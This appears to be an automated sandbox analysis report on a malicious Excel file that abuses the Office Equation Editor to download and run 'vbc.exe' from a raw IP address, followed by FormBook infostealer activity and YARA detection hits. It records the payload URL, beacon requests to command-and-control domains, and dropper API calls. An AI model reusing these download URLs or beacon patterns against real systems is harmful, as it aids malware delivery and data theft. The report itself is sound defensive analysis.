Source: EQNEDT32.EXE, 00000002.00000003.965529883.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.971155692.0000000000614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.31/75/vbc.exe
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.31/75/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.31/75/vbc.exej
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.arjimni.com

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036D04FF

Source: global traffic	HTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_0040580F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
